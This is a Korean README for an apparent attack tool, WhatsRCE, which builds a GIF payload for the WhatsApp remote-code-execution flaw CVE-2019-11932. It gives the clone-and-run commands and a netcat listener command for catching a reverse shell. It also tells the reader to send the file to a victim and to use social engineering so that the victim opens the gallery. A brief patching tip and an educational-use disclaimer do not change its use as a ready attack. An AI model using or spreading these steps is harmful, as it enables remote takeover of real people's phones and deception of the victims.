WhatsRCE
이것은 CVE-2019-11932 (WhatsApp 원격 코드 실행)를 위한 자동화된 페이로드 생성 도구입니다.
- GCC 자동 설치 (무해한 명령어이며, 오픈소스이므로 확인 가능합니다)
- .GIF 파일로 저장
사용 방법 ?
sudo apt install git
git clone https://github.com/KeepWannabe/WhatsRCE
cd WhatsRCE && bash start.sh
셸을 얻는 방법 ?
- 피해자 사용자에게 .GIF 파일을 문서로(이미지가 아닌) 보내기만 하면 됩니다.
- 그리고 WhatsRCE 도구에서 설정한 포트로 nc / netcat을 설정합니다. {nc -lnvp your_port}
- 피해자가 이 익스플로잇을 실행하도록 유도하기 위해 사회공학 공격을 사용할 수 있습니다.
- 피해자에게 WhatsApp을 통해 갤러리를 열도록 하고, 피해자가 아무 사진이나 보내도록 한 후(필요 없음, 갤러리에 가기만 하면 됨), 몇 초 후 피해자로부터 셸 연결을 받게 됩니다.
또는 그냥 이것을 보세요.
데모 영상
https://drive.google.com/file/d/1T-v5XG8yQuiPojeMpOAG6UGr2TYpocIj/view
위 링크에 접속할 수 없는 경우
https://drive.google.com/open?id=1X9nBlf5oj5ef2UoYGOfusjxAiow8nKEK
이 공격을 예방하는 방법?
- WhatsApp을 최신 버전으로 업데이트하세요. (버전 2.19.244에서 패치됨)
- 모르는 사람으로부터 오디오, 이미지 등 모든 파일을 받지 않도록 하세요.
이것은 학습 목적으로만 제공되며, 범죄에 사용할 경우 발생하는 결과 등에 대해 저는 책임지지 않습니다!